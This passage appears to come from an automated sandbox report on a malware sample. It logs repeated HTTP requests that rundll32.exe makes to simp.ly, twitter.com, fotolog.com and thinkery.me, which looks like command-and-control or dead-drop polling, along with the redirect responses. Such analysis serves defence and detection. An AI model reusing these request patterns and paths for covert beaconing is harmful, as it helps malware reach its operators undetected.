                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                49192.168.2.649853192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:52.057010889 CET3314OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:52.225599051 CET3348INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:52 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                5192.168.2.649733192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:03.139276981 CET1415OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:03.308013916 CET1416INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:03 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                50192.168.2.649857104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:52.877435923 CET5349OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:53.041368961 CET5350INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:53 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_DcDRVdxuALbB/n9ah1Guhg=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:52 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403389297266743; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:52 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 61d75c8d9c96baf586eaf8b1b20fbab4
                                                                                                                                                x-response-time: 107


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                51192.168.2.649860172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:53.734380007 CET5362OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:54.164268970 CET5363INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:54 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:53 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d83d18b000072ed548c4000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zgBvMIZRSrr4sfl%2BN8mHbLe6uFM4fAM8HZNQ8nMUeXfUmMsjsMI3rze2A%2FdWpWo15L2VZ2mEBi35JH%2FD8SwZj8fTZd05VoSVpQgyGINZ8bk%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3bfc1a0472ed-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                52192.168.2.6498625.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:55.165966034 CET6678OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:55.236321926 CET6678INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:55 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                53192.168.2.649864192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:55.984189987 CET6693OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:56.148189068 CET6695INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:56 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                54192.168.2.649866104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:56.799660921 CET6706OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:56.966479063 CET6707INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:56 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_RL3wBmhzApoYmZhbyRTLJw=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:56 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403389690084186; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:56 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 1e3d8d00f6bcdd8fd41ef59f0fd40d05
                                                                                                                                                x-response-time: 110


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                55192.168.2.649869172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:57.788516998 CET6725OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:58.381333113 CET6728INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:58 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:58 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d83e1630000732fe030f000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3OEMy%2BBro6Wp1mEIdkZ13b%2B9wola3wgzEadea88RAxZCSlRpq%2Bv5GzM%2BNiLXBUcJmmqDT9LfkNBuMHXF908tr6N6n7LRAIqZ3Q2oOVZajEg%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3c1569be732f-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                56192.168.2.6498715.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:59.445190907 CET6775OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:59.516396046 CET6775INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:59 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                57192.168.2.649873192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:00.294738054 CET6787OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:00.458856106 CET6787INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:00 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                58192.168.2.649875104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:01.186979055 CET6796OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:01.353746891 CET6796INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:01 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_GCEdLvQBcHLZRYBlMCP1/Q=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:01 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403390129070820; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:01 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 9b1c413c025da36dd7802f509ab73022
                                                                                                                                                x-response-time: 108


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                59192.168.2.649878172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:02.026150942 CET6808OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:02.473526001 CET6809INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:02 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:02 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d83f1f000001e751f158000000001
                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2Bo4ozNkuthahV2pKOhOtWjFb0%2BpUZhG9I7e%2FUDgovW4Mv6Mz%2Fxfqx3J7JIMjvmuKPtgYWrbwCol9vGpmlc1xvUpAcD3NWDu0w0MvlrAzhaY%3D"}],"max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3c2feea21e75-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                6192.168.2.649736104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:04.011565924 CET1436OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:04.172714949 CET1437INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:04 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_Dq/ApLV81KbQhc7ySrgMug=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:04 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403384410856275; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:04 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: cdb1f178815da825a5bb4ccc9b56aadc
                                                                                                                                                x-response-time: 104


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                60192.168.2.6498805.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:03.516771078 CET6821OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:03.586834908 CET6821INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:03 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                61192.168.2.649882192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:04.350344896 CET6832OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:04.521970034 CET6833INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:04 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                62192.168.2.649884104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:05.266710043 CET6841OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:05.430567980 CET6842INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:05 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_euNre/4vQcT8rc9ngOkyvA=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:05 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403390536173249; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:05 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 7a39e3c7b68d473e64607fd165ebc2af
                                                                                                                                                x-response-time: 107


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                63192.168.2.649887172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:06.138231993 CET6854OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:06.559381962 CET6854INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:06 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:06 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d8401ff00002056d8a6b000000001
